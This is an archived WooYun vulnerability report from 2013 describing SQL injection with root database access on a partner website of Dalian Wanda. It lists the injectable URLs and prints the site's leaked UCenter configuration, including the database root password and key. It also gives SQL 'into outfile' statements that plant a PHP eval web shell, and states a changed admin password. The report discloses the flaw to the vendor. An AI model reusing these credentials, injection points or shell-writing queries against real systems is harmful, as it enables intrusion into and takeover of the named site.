当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046385

漏洞标题:万达某分站SQL注入ROOT权限(已getshell)

相关厂商:大连万达集团股份有限公司

漏洞作者: 爱上襄阳

提交时间:2013-12-18 23:10

修复时间:2014-02-01 23:11

公开时间:2014-02-01 23:11

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-18: 细节已通知厂商并且等待厂商处理中
2013-12-19: 厂商已经确认,细节仅向厂商公开
2013-12-29: 细节向核心白帽子及相关领域专家公开
2014-01-08: 细节向普通白帽子公开
2014-01-18: 细节向实习白帽子公开
2014-02-01: 细节向公众公开

简要描述:

万达某分站SQL注入ROOT权限(已getshell)

详细说明:

万达分站大玩家官网SQL注入ROOT权限(已getshell)
注入点:
http://www.flyhigh.com.cn/skin/default/js/articleComment.php?classid=7
http://www.flyhigh.com.cn/skin/default/js/articleComment.php?classid=7&id=736
数据库信息:

QQ截图20131218202608.png


通过暴露出的路径读ucenter配置文件:

QQ截图20131218202807.png


define('UC_CONNECT', 'mysql');
define('UC_DBHOST', 'localhost');
define('UC_DBUSER', 'root');
define('UC_DBPW', 'superplayer0!');
define('UC_DBNAME', 'superplayer');
define('UC_DBCHARSET', 'utf8');
define('UC_DBTABLEPRE', '`superplayer`.flydis_ucenter_');
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'utf-8');
define('UC_KEY', '123456');
define('UC_API', 'http://www.flyhigh.com.cn/bbs/uc_server');
define('UC_APPID', '1');
define('UC_IP', ' ');
define('UC_PPP', 20);
在本地架设进行配置:

QQ截图20131218204137.png


此时成功修改了admin的密码,这里将admin的密码改成了123!@#a,请厂商自行修改。
成功进入了论坛后台:

QQ截图20131218204251.png


参考乌云X2 root getshell WooYun: Discuz X2 后台getshell(当mysql为root时)
在站长-数据库-升级进行SQL执行
select '1' into outfile 'D:/AppServ/www\bbs/1.txt'
/*!select*/ '1' /*!into outfile*/ 'D:/AppServ/www/bbs/3.txt'
/*!select*/ '<?php @eval($_POST[cmd]);?>' /*!into outfile*/ 'D:/AppServ/www/bbs/bbs.php'
成功写入一句话

QQ截图20131218205200.png


漏洞证明:

同上

修复方案:

关键字过滤;bbs.php自删;密码自己重设吧。

版权声明:转载请注明来源 爱上襄阳@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-12-19 00:41

厂商回复:

感谢爱上襄阳同学的关注与贡献!此漏洞目测存在且为严重漏洞。只是有一点,这个网站不是我公司站点,是我方合作伙伴站点。马上将此问题转至合作伙伴处理!谢谢!

最新状态:

暂无


漏洞评价:

评论